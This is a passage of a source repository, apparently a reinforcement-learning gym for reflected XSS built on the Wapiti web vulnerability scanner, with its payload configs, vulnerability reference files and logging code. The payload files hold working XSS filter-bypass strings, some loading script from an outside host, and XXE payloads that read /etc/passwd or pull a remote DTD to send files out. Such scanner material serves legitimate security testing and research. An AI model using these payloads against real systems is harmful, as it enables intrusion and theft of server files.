253 | value = String.fromCharCode(0,__XSS__,1)
254 | case_sensitive = yes
255 | 
256 | [tab_object_data_fromcharcode]
257 | payload = <object[TAB]data=javascript:String.fromCharCode(0,__XSS__,1)>
258 | tag = object
259 | attribute = data
260 | value = javascript:String.fromCharCode(0,__XSS__,1)
261 | case_sensitive = yes
262 | 
263 | 
264 | 
265 | ; Bypass remove of tags
266 | [open_script_tag_remove_alert_quote]
267 | payload = <scr<script>ipt>alert('__XSS__')</script>
268 | tag = script
269 | attribute = string
270 | value = alert('__XSS__')
271 | case_sensitive = yes
272 | 
273 | [script_tag_remove_alert_quote]
274 | payload = <scr<script>ipt>alert('__XSS__')</scr</script>ipt>
275 | tag = script
276 | attribute = string
277 | value = alert('__XSS__')
278 | case_sensitive = yes
279 | 
280 | [open_script_tag_remove_alert_double_quote]
281 | payload = <scr<script>ipt>alert("__XSS__")</script>
282 | tag = script
283 | attribute = string
284 | value = alert("__XSS__")
285 | case_sensitive = yes
286 | 
287 | [script_tag_remove_alert_double_quote]
288 | payload = <scr<script>ipt>alert("__XSS__")</scr</script>ipt>
289 | tag = script
290 | attribute = string
291 | value = alert("__XSS__")
292 | case_sensitive = yes
293 | 
294 | [open_script_tag_remove_fromcharcode]
295 | payload = <scr<script>ipt>String.fromCharCode(0,__XSS__,1)</script>
296 | tag = script
297 | attribute = string
298 | value = String.fromCharCode(0,__XSS__,1)
299 | case_sensitive = yes
300 | 
301 | [script_tag_remove_fromcharcode]
302 | payload = <scr<script>ipt>String.fromCharCode(0,__XSS__,1)</scr</script>ipt>
303 | tag = script
304 | attribute = string
305 | value = String.fromCharCode(0,__XSS__,1)
306 | case_sensitive = yes
307 | 
308 | [open_script_tag_remove_absolute_src]
309 | payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></script>
310 | tag = script
311 | attribute = src
312 | value = https://wapiti3.ovh/__XSS__z.js
313 | case_sensitive = no
314 | 
315 | [script_tag_remove_absolute_src]
316 | payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></scr</script>ipt>
317 | tag = script
318 | attribute = src
319 | value = https://wapiti3.ovh/__XSS__z.js
320 | case_sensitive = no
321 | 
322 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/attacks/xxePayloads.ini:
--------------------------------------------------------------------------------
 1 | [direct_linux_passwd]
 2 | payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
 3 | rules = root:x:0:
 4 |     root:*:0:0
 5 | 
 6 | [direct_linux_networks]
 7 | payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/networks">]><foo>&xxe;</foo>
 8 | rules = link-local
 9 | 
10 | [direct_windows_networks]
11 | payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/system32/drivers/etc/networks">]><foo>&xxe;</foo>
12 | rules = network name/network number mappings
13 | 
14 | [out_of_band_linux_passwd]
15 | payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
16 | rules = root:x:0:
17 |     root:*:0:0
18 | 
19 | [out_of_band_windows_networks]
20 | payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/windows.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
21 | rules = network name/network number mappings
22 | 
23 | [out_of_band_linux_networks]
24 | payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux2.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
25 | rules = link-local


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/de/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/de/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/en/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/en/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/es/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/es/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/fr/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/fr/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/ms/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/ms/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/pt/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/pt/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/language/zh/LC_MESSAGES/wapiti.mo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/config/language/zh/LC_MESSAGES/wapiti.mo


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/reports/generators.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <reportGenerators>
 3 |     <reportGenerator>
 4 |         <description>XML format</description>
 5 |         <reportTypeKey>xml</reportTypeKey>
 6 |         <classModule>xmlreportgenerator</classModule>
 7 |         <className>XMLReportGenerator</className>
 8 |     </reportGenerator>
 9 |     <reportGenerator>
10 |         <description>HTML format</description>
11 |         <reportTypeKey>html</reportTypeKey>
12 |         <classModule>htmlreportgenerator</classModule>
13 |         <className>HTMLReportGenerator</className>
14 |     </reportGenerator>
15 |     <reportGenerator>
16 |         <description>TXT format</description>
17 |         <reportTypeKey>txt</reportTypeKey>
18 |         <classModule>txtreportgenerator</classModule>
19 |         <className>TXTReportGenerator</className>
20 |     </reportGenerator>
21 |     <reportGenerator>
22 |         <description>VulneraNET format</description>
23 |         <reportTypeKey>vulneranet</reportTypeKey>
24 |         <classModule>vulneranetxmlreportgenerator</classModule>
25 |         <className>VulneraNetXMLReportGenerator</className>
26 |     </reportGenerator>
27 |     <reportGenerator>
28 |         <description>JSON format</description>
29 |         <reportTypeKey>json</reportTypeKey>
30 |         <classModule>jsonreportgenerator</classModule>
31 |         <className>JSONReportGenerator</className>
32 |     </reportGenerator>
33 |     <reportGenerator>
34 |         <description>OpenVAS XML format</description>
35 |         <reportTypeKey>openvas</reportTypeKey>
36 |         <classModule>openvasreportgenerator</classModule>
37 |         <className>OpenVASReportGenerator</className>
38 |     </reportGenerator>
39 | </reportGenerators>
40 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/vulnerabilities/anomalies.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <anomalies>
 3 |     <anomaly name="Internal Server Error">
 4 |         <description>Internal server error description</description>
 5 |         <solution text="Internal server error solution"/>
 6 |         <references>
 7 |             <reference>
 8 |                 <title>Wikipedia article for 5xx HTTP error codes</title>
 9 |                 <url>https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#5xx_Server_Error</url>
10 |             </reference>
11 |         </references>
12 |     </anomaly>
13 |     <anomaly name="Resource consumption">
14 |         <description>Resource consumption description</description>
15 |         <solution text="Resource consumption solution"/>
16 |         <references>
17 |             <reference>
18 |                 <title>http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification)</title>
19 |                 <url>http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification)</url>
20 |             </reference>
21 |             <reference>
22 |                 <title><![CDATA[CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')]]></title>
23 |                 <url>http://cwe.mitre.org/data/definitions/400.html</url>
24 |             </reference>
25 |         </references>
26 |     </anomaly>
27 | </anomalies>
28 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/config/vulnerabilities/vulnerabilities.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <vulnerabilities>
  3 |     <vulnerability name="SQL Injection">
  4 |         <description>SQL Injection description</description>
  5 |         <solution text="SQL Injection solution"/>
  6 |         <references>
  7 |             <reference>
  8 |                 <title>http://www.owasp.org/index.php/SQL_Injection</title>
  9 |                 <url>http://www.owasp.org/index.php/SQL_Injection</url>
 10 |             </reference>
 11 |             <reference>
 12 |                 <title>http://en.wikipedia.org/wiki/SQL_injection</title>
 13 |                 <url>http://en.wikipedia.org/wiki/SQL_injection</url>
 14 |             </reference>
 15 |             <reference>
 16 |                 <title><![CDATA[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]]></title>
 17 |                 <url>http://cwe.mitre.org/data/definitions/89.html</url>
 18 |             </reference>
 19 |         </references>
 20 |     </vulnerability>
 21 |     <vulnerability name="Blind SQL Injection">
 22 |         <description>Blind SQL Injection description</description>
 23 |         <solution text="Blind SQL Injection solution" />
 24 |         <references>
 25 |             <reference>
 26 |                 <title>http://www.owasp.org/index.php/Blind_SQL_Injection</title>
 27 |                 <url>http://www.owasp.org/index.php/Blind_SQL_Injection</url>
 28 |             </reference>
 29 |             <reference>
 30 |                 <title>http://www.imperva.com/resources/adc/blind_sql_server_injection.html</title>
 31 |                 <url>http://www.imperva.com/resources/adc/blind_sql_server_injection.html</url>
 32 |             </reference>
 33 |             <reference>
 34 |                 <title><![CDATA[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]]></title>
 35 |                 <url>http://cwe.mitre.org/data/definitions/89.html</url>
 36 |             </reference>
 37 |         </references>
 38 |     </vulnerability>
 39 |     <vulnerability name="File Handling">
 40 |         <description>File Handling description</description>
 41 |         <solution text="File Handling solution" />
 42 |         <references>
 43 |             <reference>
 44 |                 <title>http://www.owasp.org/index.php/Path_Traversal</title>
 45 |                 <url>http://www.owasp.org/index.php/Path_Traversal</url>
 46 |             </reference>
 47 |             <reference>
 48 |                 <title>http://www.acunetix.com/websitesecurity/directory-traversal.htm</title>
 49 |                 <url>http://www.acunetix.com/websitesecurity/directory-traversal.htm</url>
 50 |             </reference>
 51 |             <reference>
 52 |                 <title><![CDATA[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')]]></title>
 53 |                 <url>http://cwe.mitre.org/data/definitions/22.html</url>
 54 |             </reference>
 55 |         </references>
 56 |     </vulnerability>
 57 |     <vulnerability name="Cross Site Scripting">
 58 |         <description>Cross Site Scripting description</description>
 59 |         <solution text="Cross Site Scripting solution" />
 60 |         <references>
 61 |             <reference>
 62 |                 <title>http://www.owasp.org/index.php/Cross_Site_Scripting</title>
 63 |                 <url>http://www.owasp.org/index.php/Cross_Site_Scripting</url>
 64 |             </reference>
 65 |             <reference>
 66 |                 <title>http://en.wikipedia.org/wiki/Cross-site_scripting</title>
 67 |                 <url>http://en.wikipedia.org/wiki/Cross-site_scripting</url>
 68 |             </reference>
 69 |             <reference>
 70 |                 <title><![CDATA[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')]]></title>
 71 |                 <url>http://cwe.mitre.org/data/definitions/79.html</url>
 72 |             </reference>
 73 |         </references>
 74 |     </vulnerability>
 75 |     <vulnerability name="CRLF Injection">
 76 |         <description>CRLF description</description>
 77 |         <solution text="CRLF solution"/>
 78 |         <references>
 79 |             <reference>
 80 |                 <title>http://www.owasp.org/index.php/CRLF_Injection</title>
 81 |                 <url>http://www.owasp.org/index.php/CRLF_Injection</url>
 82 |             </reference>
 83 |             <reference>
 84 |                 <title>http://www.acunetix.com/websitesecurity/crlf-injection.htm</title>
 85 |                 <url>http://www.acunetix.com/websitesecurity/crlf-injection.htm</url>
 86 |             </reference>
 87 |             <reference>
 88 |                 <title><![CDATA[CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')]]></title>
 89 |                 <url>http://cwe.mitre.org/data/definitions/93.html</url>
 90 |             </reference>
 91 |         </references>
 92 |     </vulnerability>
 93 |     <vulnerability name="Commands execution">
 94 |         <description>Commands execution description</description>
 95 |         <solution text="Commands execution solution"/>
 96 |         <references>
 97 |             <reference>
 98 |                 <title>http://www.owasp.org/index.php/Command_Injection</title>
 99 |                 <url>http://www.owasp.org/index.php/Command_Injection</url>
100 |             </reference>
101 |             <reference>
102 |                 <title><![CDATA[CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')]]></title>
103 |                 <url>http://cwe.mitre.org/data/definitions/78.html</url>
104 |             </reference>
105 |         </references>
106 |     </vulnerability>
107 |     <vulnerability name="Htaccess Bypass">
108 |         <description>Htaccess bypass description</description>
109 |         <solution text="Htaccess bypass solution"/>
110 |         <references>
111 |             <reference>
112 |                 <title>http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html</title>
113 |                 <url>http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html</url>
114 |             </reference>
115 |             <reference>
116 |                 <title>CWE-538: File and Directory Information Exposure</title>
117 |                 <url>http://cwe.mitre.org/data/definitions/538.html</url>
118 |             </reference>
119 |         </references>
120 |     </vulnerability>
121 |     <vulnerability name="Backup file">
122 |         <description>Backup file description</description>
123 |         <solution text="Backup file solution"/>
124 |         <references>
125 |             <reference>
126 |                 <title>Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)</title>
127 |                 <url>http://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)</url>
128 |             </reference>
129 |             <reference>
130 |                 <title>CWE-530: Exposure of Backup File to an Unauthorized Control Sphere</title>
131 |                 <url>http://cwe.mitre.org/data/definitions/530.html</url>
132 |             </reference>
133 |         </references>
134 |     </vulnerability>
135 |     <vulnerability name="Potentially dangerous file">
136 |         <description>Potentially dangerous file description</description>
137 |         <solution text="Potentially dangerous file solution"/>
138 |         <references>
139 |             <reference>
140 |                 <title>The Open Source Vulnerability Database</title>
141 |                 <url>http://osvdb.org/</url>
142 |             </reference>
143 |         </references>
144 |     </vulnerability>
145 |     <vulnerability name="Server Side Request Forgery">
146 |         <description>Server Side Request Forgery description</description>
147 |         <solution text="Server Side Request Forgery solution" />
148 |         <references>
149 |             <reference>
150 |                 <title>Server Side Request Forgery (OWASP)</title>
151 |                 <url>https://www.owasp.org/index.php/Server_Side_Request_Forgery</url>
152 |             </reference>
153 |             <reference>
154 |                 <title>What is Server Side Request Forgery (Acunetix)?</title>
155 |                 <url>https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/</url>
156 |             </reference>
157 |             <reference>
158 |                 <title>What is the Server Side Request Forgery Vulnerability (Netsparker)</title>
159 |                 <url>https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/</url>
160 |             </reference>
161 |             <reference>
162 |                 <title>CWE-918: Server-Side Request Forgery (SSRF)</title>
163 |                 <url>https://cwe.mitre.org/data/definitions/918.html</url>
164 |             </reference>
165 |         </references>
166 |     </vulnerability>
167 |     <vulnerability name="Open Redirect">
168 |         <description>Open Redirect description</description>
169 |         <solution text="Open Redirect solution"/>
170 |         <references>
171 |             <reference>
172 |                 <title>Owasp Open Redirect</title>
173 |                 <url>https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html</url>
174 |             </reference>
175 |             <reference>
176 |                 <title><![CDATA[CWE-601: URL Redirection to Untrusted Site ('Open Redirect')]]></title>
177 |                 <url>https://cwe.mitre.org/data/definitions/601.html</url>
178 |             </reference>
179 |         </references>
180 |     </vulnerability>
181 |     <vulnerability name="XXE">
182 |         <description>XXE description</description>
183 |         <solution text="XXE solution"/>
184 |         <references>
185 |             <reference>
186 |                 <title>Owasp XML External Entity (XXE) Processing</title>
187 |                 <url>https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing</url>
188 |             </reference>
189 |             <reference>
190 |                 <title>CWE-611: Improper Restriction of XML External Entity Reference</title>
191 |                 <url>https://cwe.mitre.org/data/definitions/611.html</url>
192 |             </reference>
193 |         </references>
194 |     </vulnerability>
195 | </vulnerabilities>
196 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/language/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/__pycache__/language.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/language/__pycache__/language.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/__pycache__/logger.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/language/__pycache__/logger.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/__pycache__/vulnerability.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/attack_module/language/__pycache__/vulnerability.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/language.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # -*- coding: utf-8 -*-
 3 | # This file is part of the Wapiti project (http://wapiti.sourceforge.io)
 4 | # Copyright (C) 2008-2020 Nicolas Surribas
 5 | #
 6 | # Original author :
 7 | # David del Pozo
 8 | # Alberto Pastor
 9 | # Copyright (C) 2008 Informatica Gesfor
10 | # ICT Romulus (http://www.ict-romulus.eu)
11 | #
12 | # This program is free software; you can redistribute it and/or modify
13 | # it under the terms of the GNU General Public License as published by
14 | # the Free Software Foundation; either version 2 of the License, or
15 | # (at your option) any later version.
16 | #
17 | # This program is distributed in the hope that it will be useful,
18 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
19 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
20 | # GNU General Public License for more details.
21 | #
22 | # You should have received a copy of the GNU General Public License
23 | # along with this program; if not, write to the Free Software
24 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
25 | import os
26 | import locale
27 | import gettext
28 | import sys
29 | 
30 | AVAILABLE_LANGS = ["en", "es", "fr", "pt", "zh"]  # "de", "ms"]
31 | 
32 | if sys.platform == "win32":
33 |     import ctypes
34 | 
35 |     windll = ctypes.windll.kernel32
36 |     def_locale = locale.windows_locale[windll.GetUserDefaultUILanguage()]  # for example fr_FR
37 |     lang_country = def_locale[:2]
38 | else:
39 |     # getdefaultlocale will return (None, None) if locale settings are incorrectly set (ex: LANG=C)
40 |     def_locale = locale.getdefaultlocale()  # for example ('fr_FR', 'cp1252')
41 |     lang_country = def_locale[0]
42 | 
43 | lang = None
44 | if isinstance(lang_country, str) and len(lang_country) >= 2:
45 |     lang = lang_country[:2]  # fr
46 | 
47 | if lang is None:
48 |     print("Unable to correctly determine your language settings. Using english as default.")
49 |     print("Please check your locale settings for internationalization features.")
50 |     print("===============================================================")
51 |     lang = "en"
52 | elif lang not in AVAILABLE_LANGS:
53 |     # if lang is not one of the supported languages, we use english
54 |     print("Oops! No translations found for your language... Using english.")
55 |     print("Please send your translations for improvements.")
56 |     print("===============================================================")
57 |     lang = "en"
58 | 
59 | BASE_DIR = os.path.dirname(sys.modules["wapitiCore"].__file__)
60 | LANG_PATH = os.path.join(BASE_DIR, "config", "language")
61 | 
62 | lan = gettext.translation(
63 |     "wapiti",
64 |     LANG_PATH,
65 |     languages=[lang, "en"],
66 |     codeset="UTF-8"
67 | )
68 | _ = lan.gettext


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/logger.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | #
  4 | # This file is part of the Wapiti project (http://wapiti.sourceforge.io)
  5 | # Copyright (C) 2017-2020 Nicolas Surribas
  6 | #
  7 | # This program is free software; you can redistribute it and/or modify
  8 | # it under the terms of the GNU General Public License as published by
  9 | # the Free Software Foundation; either version 2 of the License, or
 10 | # (at your option) any later version.
 11 | #
 12 | # This program is distributed in the hope that it will be useful,
 13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 15 | # GNU General Public License for more details.
 16 | #
 17 | # You should have received a copy of the GNU General Public License
 18 | # along with this program; if not, write to the Free Software
 19 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 20 | import sys
 21 | from abc import abstractmethod
 22 | 
 23 | 
 24 | class BaseLogger:
 25 |     def __init__(self):
 26 |         self._verbose = 0
 27 | 
 28 |     @property
 29 |     def verbose(self):
 30 |         return self._verbose
 31 | 
 32 |     @verbose.setter
 33 |     def verbose(self, value: int):
 34 |         self._verbose = value
 35 | 
 36 |     @abstractmethod
 37 |     def log(self, fmt_string, *args):
 38 |         pass
 39 | 
 40 |     @abstractmethod
 41 |     def log_red(self, fmt_string, *args):
 42 |         pass
 43 | 
 44 |     @abstractmethod
 45 |     def log_green(self, fmt_string, *args):
 46 |         pass
 47 | 
 48 |     @abstractmethod
 49 |     def log_yellow(self, fmt_string, *args):
 50 |         pass
 51 | 
 52 |     @abstractmethod
 53 |     def log_cyan(self, fmt_string, *args):
 54 |         pass
 55 | 
 56 |     @abstractmethod
 57 |     def log_white(self, fmt_string, *args):
 58 |         pass
 59 | 
 60 |     @abstractmethod
 61 |     def log_magenta(self, fmt_string, *args):
 62 |         pass
 63 | 
 64 |     @abstractmethod
 65 |     def log_blue(self, fmt_string, *args):
 66 |         pass
 67 | 
 68 |     @abstractmethod
 69 |     def log_orange(self, fmt_string, *args):
 70 |         pass
 71 | 
 72 | 
 73 | class ConsoleLogger(BaseLogger):
 74 |     # Color codes
 75 |     STD = "\033[0;0m"
 76 |     RED = "\033[0;31m"
 77 |     GREEN = "\033[0;32m"
 78 |     ORANGE = "\033[0;33m"
 79 |     YELLOW = "\033[1;33m"
 80 |     BLUE = "\033[1;34m"
 81 |     MAGENTA = "\033[0;35m"
 82 |     CYAN = "\033[0;36m"
 83 |     GB = "\033[0;30m\033[47m"
 84 | 
 85 |     def __init__(self):
 86 |         super().__init__()
 87 |         self._color = False
 88 | 
 89 |     @property
 90 |     def color(self):
 91 |         return self._color
 92 | 
 93 |     @color.setter
 94 |     def color(self, value: bool):
 95 |         self._color = value
 96 | 
 97 |     def log(self, fmt_string, *args):
 98 |         if len(args) == 0:
 99 |             print(fmt_string)
100 |         else:
101 |             print(fmt_string.format(*args))
102 |         if self.color:
103 |             sys.stdout.write(self.STD)
104 | 
105 |     def log_red(self, fmt_string, *args):
106 |         if self.color:
107 |             sys.stdout.write(self.RED)
108 |         self.log(fmt_string, *args)
109 | 
110 |     def log_green(self, fmt_string, *args):
111 |         if self.color:
112 |             sys.stdout.write(self.GREEN)
113 |         self.log(fmt_string, *args)
114 | 
115 |     def log_yellow(self, fmt_string, *args):
116 |         if self.color:
117 |             sys.stdout.write(self.YELLOW)
118 |         self.log(fmt_string, *args)
119 | 
120 |     def log_cyan(self, fmt_string, *args):
121 |         if self.color:
122 |             sys.stdout.write(self.CYAN)
123 |         self.log(fmt_string, *args)
124 | 
125 |     def log_white(self, fmt_string, *args):
126 |         if self.color:
127 |             sys.stdout.write(self.GB)
128 |         self.log(fmt_string, *args)
129 | 
130 |     def log_magenta(self, fmt_string, *args):
131 |         if self.color:
132 |             sys.stdout.write(self.MAGENTA)
133 |         self.log(fmt_string, *args)
134 | 
135 |     def log_blue(self, fmt_string, *args):
136 |         if self.color:
137 |             sys.stdout.write(self.BLUE)
138 |         self.log(fmt_string, *args)
139 | 
140 |     def log_orange(self, fmt_string, *args):
141 |         if self.color:
142 |             sys.stdout.write(self.ORANGE)
143 |         self.log(fmt_string, *args)


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/language/vulnerability.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | # This file is part of the Wapiti project (http://wapiti.sourceforge.io)
  5 | # Copyright (C) 2013-2020 Nicolas Surribas
  6 | #
  7 | # This program is free software; you can redistribute it and/or modify
  8 | # it under the terms of the GNU General Public License as published by
  9 | # the Free Software Foundation; either version 2 of the License, or
 10 | # (at your option) any later version.
 11 | #
 12 | # This program is distributed in the hope that it will be useful,
 13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 15 | # GNU General Public License for more details.
 16 | #
 17 | # You should have received a copy of the GNU General Public License
 18 | # along with this program; if not, write to the Free Software
 19 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 20 | # from gym_reflected_xss.attack_module.language.language import _
 21 | 
 22 | 
 23 | class GenericObservation:
 24 |     # Constants
 25 |     MSG_EVIL_URL = ("  Evil url: {0}")
 26 |     MSG_PARAM_INJECT = ("{0} in {1} via injection in the parameter {2}")
 27 |     MSG_FROM = ("  coming from {0}")
 28 |     MSG_QS_INJECT = ("{0} in {1} via injection in the query string")
 29 |     MSG_PATH_INJECT = ("{0} in {1} via injection in the resource path")
 30 |     MSG_EVIL_PARAM = ("Involved parameter: {0}")
 31 |     MSG_EVIL_REQUEST = ("Evil request:")
 32 | 
 33 |     HIGH_LEVEL = "1"
 34 |     MEDIUM_LEVEL = "2"
 35 |     LOW_LEVEL = "3"
 36 | 
 37 |     def __init__(self):
 38 |         self.name = ""
 39 |         self.description = ""
 40 |         self.solution = ""
 41 |         self.references = {}
 42 | 
 43 |     def get_name(self):
 44 |         return self.name
 45 | 
 46 |     def get_description(self):
 47 |         return self.description
 48 | 
 49 |     def get_solution(self):
 50 |         return self.solution
 51 | 
 52 |     def get_references(self):
 53 |         return self.references
 54 | 
 55 |     def set_name(self, name):
 56 |         self.name = name
 57 | 
 58 |     def set_description(self, description):
 59 |         self.description = description
 60 | 
 61 |     def set_solution(self, solution):
 62 |         self.solution = solution
 63 | 
 64 |     def set_references(self, references):
 65 |         self.references = references
 66 | 
 67 | 
 68 | class Notice(GenericObservation):
 69 |     # Constants
 70 |     ERROR_404 = ("File not found message")
 71 | 
 72 | 
 73 | class Vulnerability(Notice):
 74 |     # Constants
 75 |     SQL_INJECTION = ("SQL Injection")
 76 |     BLIND_SQL_INJECTION = ("Blind SQL Injection")
 77 |     FILE_HANDLING = ("File Handling")
 78 |     XSS = ("Cross Site Scripting")
 79 |     CRLF = ("CRLF Injection")
 80 |     EXEC = ("Commands execution")
 81 |     HTACCESS = ("Htaccess Bypass")
 82 |     BACKUP = ("Backup file")
 83 |     NIKTO = ("Potentially dangerous file")
 84 |     SSRF = ("Server Side Request Forgery")
 85 |     REDIRECT = ("Open Redirect")
 86 |     XXE = ("XXE")
 87 | 
 88 | 
 89 | class Anomaly(Notice):
 90 |     # Constants
 91 |     ERROR_500 = ("Internal Server Error")
 92 |     RES_CONSUMPTION = ("Resource consumption")
 93 | 
 94 |     MSG_500 = ("Received a HTTP 500 error in {0}")
 95 |     MSG_TIMEOUT = ("Timeout occurred in {0}")
 96 | 
 97 |     MSG_QS_TIMEOUT = ("The request timed out while attempting to inject a payload in the query string")
 98 |     MSG_PATH_TIMEOUT = ("The request timed out while attempting to inject a payload in the resource path")
 99 |     MSG_PARAM_TIMEOUT = ("The request timed out while attempting to inject a payload in the parameter {0}")
100 | 
101 |     MSG_QS_500 = ("The server responded with a 500 HTTP error code "
102 |                    "while attempting to inject a payload in the query string")
103 |     MSG_PATH_500 = ("The server responded with a 500 HTTP error code "
104 |                      "while attempting to inject a payload in the resource path")
105 |     MSG_PARAM_500 = ("The server responded with a 500 HTTP error code "
